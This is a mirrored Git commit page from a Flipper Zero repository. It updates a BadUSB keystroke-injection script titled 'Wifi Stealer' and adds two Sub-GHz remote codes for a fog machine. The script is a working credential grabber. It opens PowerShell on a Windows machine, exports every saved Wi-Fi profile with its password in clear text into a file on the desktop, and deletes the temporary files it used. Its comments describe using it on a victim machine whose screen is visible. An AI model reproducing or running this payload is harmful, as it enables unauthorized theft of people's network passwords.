mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-02 20:00:12 +00:00
Merge pull request #132 from the0bone/main
Update Wifi-Stealer_Zoom.txt
This commit is contained in:
commit
ffdf5af4c6
@ -1,19 +1,25 @@
|
||||
REM Title: Wifi Stealer
|
||||
REM Author: 7h30th3r0n3
|
||||
REM Reworked: the0bone
|
||||
REM Target: Windows 7/8/10/11
|
||||
REM Version: 1.1
|
||||
REM Version: 1.2
|
||||
REM Category: Grabber
|
||||
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop, then it opens the file and zooms in
|
||||
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
|
||||
REM Designed to be used for mouse hijacking on a machine whose screen is visible
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
|
||||
DELAY 2000
|
||||
REM setting variable
|
||||
STRING $desktop = ([Environment]::GetFolderPath("Desktop"))
|
||||
ENTER
|
||||
REM Creating a new folder in Temp with random name to store the xml files and create single text file.
|
||||
STRING New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> $desktop\0.txt; Set-Location -Path "$env:temp"; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit
|
||||
ENTER
|
||||
GUI m
|
||||
DELAY 4000
|
||||
GUI m
|
||||
DELAY 2000
|
||||
STRING 0
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
8
Sub-GHz/Misc/Fog_Maschine_TFM01_off.sub
Normal file
8
Sub-GHz/Misc/Fog_Maschine_TFM01_off.sub
Normal file
@ -0,0 +1,8 @@
|
||||
Filetype: Flipper SubGhz Key File
|
||||
Version: 1
|
||||
Frequency: 433920000
|
||||
Preset: FuriHalSubGhzPresetOok650Async
|
||||
Protocol: Princeton
|
||||
Bit: 24
|
||||
Key: 00 00 00 00 00 45 55 30
|
||||
TE: 372
|
8
Sub-GHz/Misc/Fog_Maschine_TFM01_on.sub
Normal file
8
Sub-GHz/Misc/Fog_Maschine_TFM01_on.sub
Normal file
@ -0,0 +1,8 @@
|
||||
Filetype: Flipper SubGhz Key File
|
||||
Version: 1
|
||||
Frequency: 433920000
|
||||
Preset: FuriHalSubGhzPresetOok650Async
|
||||
Protocol: Princeton
|
||||
Bit: 24
|
||||
Key: 00 00 00 00 00 45 55 0C
|
||||
TE: 386
|
Loading…
Reference in New Issue
Block a user